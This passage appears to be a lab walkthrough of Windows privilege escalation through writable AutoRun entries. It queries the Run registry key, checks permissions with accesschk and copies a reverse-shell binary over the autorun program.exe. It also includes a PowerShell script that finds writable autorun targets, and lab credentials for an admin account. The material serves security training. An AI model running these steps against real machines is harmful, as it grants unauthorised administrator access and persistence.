As we can see, we have an AutoRun entry.

Now let's enumerate it manually by querying the Run key:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

As we can see, there is an entry pointing at program.exe, so let's check its permissions with accesschk (-w lists only principals with write access, -v is verbose, -u suppresses errors):

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

As we can see, Everyone has read and write access to this file, so let's replace it with our reverse shell binary. Keep in mind that an AutoRun entry under HKLM runs in the context of whichever user logs in next, so the shell comes back with that user's privileges (here, the admin), and nothing happens until someone actually logs on. Keep a copy of the original program.exe so you can restore it, and make sure your listener is running before the next logon.

copy C:\PrivEsc\esc.exe "C:\Program Files\Autorun Program\program.exe" /Y
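The three steps above (find the AutoRun entries, resolve the binary each one launches, check who can overwrite it) can be scripted so that every Run/RunOnce key is covered rather than just the one the lab points at. The PowerShell below is an added example, not code from the original write-up or the lab; it assumes a Windows host with PowerShell 5.1 or later, and the list of low-privileged principals it treats as "weak" is an assumption you may want to extend for your environment. It also handles unquoted paths the way Windows does (trying each space-delimited prefix until one resolves) and checks the parent folder, since a writable folder lets you rename-and-replace the binary even when the file itself is locked down.

```powershell
# Added example (not from the original write-up): enumerate AutoRun entries and flag
# any whose target binary (or parent folder) a low-privileged principal can write to.
# Assumptions: Windows host, PowerShell 5.1+, and the $weakPrincipals list below.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Principals that effectively mean "any user on the box" (assumption: adjust to taste)
$weakPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME"
)

# Rights bits we care about. WriteData/CreateFiles (0x2) is what lets you overwrite or
# drop a file; WriteAttributes alone does not. Generic rights show up in ACEs as raw
# bit values rather than enum names, so they are checked explicitly.
$WRITE_DATA    = 0x2
$GENERIC_WRITE = 0x40000000
$GENERIC_ALL   = 0x10000000

function Resolve-AutorunTarget {
    param([string]$Command)
    # Quoted path: everything between the first pair of double quotes
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted path: Windows tries each space-delimited prefix until one resolves to
    # a file, so mimic that (this behaviour is also why unquoted paths are risky)
    $tokens = $Command.Trim() -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = ($tokens[0..($i - 1)] -join ' ')
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
        if (Test-Path -LiteralPath "$candidate.exe" -PathType Leaf) { return "$candidate.exe" }
    }
    return $tokens[0]
}

function Test-WeakWriteAccess {
    # Returns the first weak principal holding an Allow ACE with write rights, else $null
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $bits = [int]$ace.FileSystemRights
        $canWrite = (($bits -band $WRITE_DATA) -ne 0) -or
                    (($bits -band $GENERIC_WRITE) -ne 0) -or
                    (($bits -band $GENERIC_ALL) -ne 0)
        if ($canWrite) { return $ace.IdentityReference.Value }
    }
    return $null
}

foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        # Skip the provider metadata PowerShell attaches to every registry object
        if ($p.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        $target = Resolve-AutorunTarget -Command ([string]$p.Value)
        $label  = "$key\$($p.Name) -> $target"
        if (-not (Test-Path -LiteralPath $target -PathType Leaf)) {
            Write-Output "[?] $label (target not found; a missing binary is its own finding)"
            continue
        }
        $fileWho = $null; $dirWho = $null
        try { $fileWho = Test-WeakWriteAccess -Path $target } catch { }
        try { $dirWho  = Test-WeakWriteAccess -Path (Split-Path -Parent $target) } catch { }
        if ($fileWho)   { Write-Output "[!] $label : file writable by $fileWho" }
        elseif ($dirWho) { Write-Output "[!] $label : parent folder writable by $dirWho" }
        else             { Write-Output "[ ] $label : not writable by low-priv principals" }
    }
}
```

Run it from the low-privileged shell; any `[!]` line is a candidate for the same overwrite shown above. Entries under HKCU will naturally be writable by the current user and only pay off if a more privileged account shares that profile, so the HKLM hits are the ones worth chasing.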

Now let's simulate the admin logging in by starting a new RDP session with the username admin and the password password123:

Once the admin logs in, the AutoRun entry launches our replacement program.exe and, as we can see, the reverse shell comes back as admin.